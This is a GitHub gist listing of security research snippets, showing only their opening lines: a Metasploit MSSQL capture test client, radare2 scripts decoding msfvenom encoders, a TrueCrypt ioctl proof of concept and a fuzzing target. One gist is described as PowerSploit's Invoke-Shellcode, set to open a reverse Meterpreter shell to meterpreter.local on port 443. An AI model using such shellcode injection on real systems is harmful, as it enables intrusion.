Skip to content

Instantly share code, notes, and snippets.

xpn xpn

View GitHub Profile
@xpn
xpn / gist:8640962
Created Jan 26, 2014
Metasploit capture/mssql .Net Client
View gist:8640962
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Data;
using System.Data.SqlClient;
namespace metasploit_sql_test
{
View keybase.md

Keybase proof

I hereby claim:

  • I am xpn on github.
  • I am xpn (https://keybase.io/xpn) on keybase.
  • I have a public key whose fingerprint is 6822 0B71 BB92 8ABC 8171 4C0F 6B0B E64F 9AF4 238C

To claim this, I am signing this object:

@xpn
xpn / invoke-shellcode.ps1
Created Nov 15, 2015
Calls invoke-shellcode.ps1 upon load with a reverse meterpreter shell, and connects to meterpreter.local on port 443
View invoke-shellcode.ps1
function Invoke-Shellcode
{
<#
.SYNOPSIS
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
@xpn
xpn / libusb_xb_test.c
Created Mar 21, 2016
LibUSB test with XBOX One controller
View libusb_xb_test.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <libusb-1.0/libusb.h>
void printdev(libusb_device *dev) {
struct libusb_device_descriptor desc;
struct libusb_config_descriptor *config;
struct libusb_interface_descriptor *interdesc;
View fuzzme.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
void print_success(void *input) {
if (*(char *)(input+1) == 'Y') {
printf("GOT: %s\n", input);
return;
}
View tc_ioctl_open_test_poc.py
#!/usr/bin/env python
import sys
from ctypes import *
FILE_DEVICE_UNKNOWN = 0x00000022
METHOD_BUFFERED = 0
FILE_ANY_ACCESS = 0
TC_MAX_PATH = 260
@xpn
xpn / meterpreter_decode_xor.py
Created Dec 7, 2016
Radare2 r2pipe script to decode Meterpreters Single Byte XOR Countdown Encoder
View meterpreter_decode_xor.py
# Radare2 r2pipe script to decode Meterpreters Single Byte XOR Countdown Encoder
# https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/countdown.rb
import r2pipe
import sys
def dump(addr):
pass
def startEsil():
View pipe_jmp_call_additive.py
# r2pipe script using ESIL to decode the msfvenom jmp_call_additive XOR encoder
import r2pipe
import sys
def dump(addr):
pass
def startEsil():
r.cmd('e io.cache=true')
View alpha_mixed.py
# r2pipe script using ESIL to decode the msfvenom x86/alpha_mixed encoder
import r2pipe
import sys
def dump(addr):
pass
def startEsil():
r.cmd('e io.cache=true')
You can’t perform that action at this time.